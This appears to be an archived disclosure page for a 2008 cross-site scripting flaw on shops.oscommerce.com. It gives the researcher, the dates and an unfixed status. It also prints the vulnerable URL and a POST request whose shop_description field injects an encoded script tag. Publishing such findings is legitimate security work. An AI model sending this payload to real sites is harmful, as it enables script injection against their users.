Security researcher C1c4Tr1Z, has submitted on 22/06/2008 a cross-site-scripting (XSS) vulnerability affecting shops.oscommerce.com, which at the time of submission ranked 10105 on the web according to Alexa. 
We manually validated and published a mirror of this vulnerability on 23/06/2008. It is currently unfixed. 
If you believe that this security issue has been corrected, please send us an e-mail. | 
 
              | Date submitted: 22/06/2008 | 
Date published: 23/06/2008 | 
Fixed? Mail us! | Status:   UNFIXED |  
 
| Author: C1c4Tr1Z | 
Domain: shops.oscommerce.com | 
Category: XSS | 
Pagerank: 10105 | 
 
 
 
| URL: http://shops.oscommerce.com/directory/new,shop/action,submit | 
 
 
| POST: owner_name=XSS&owner_email=&shop_name=&shop_description=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27XSS% 27%29%3C%2Fscript%3E&shop_country=&shop_address=http%3A%2F%2F&x=51&y=3 | 
 
| 
Click here to view the mirror
 | 
 
| 
 | 
 
 
         
 |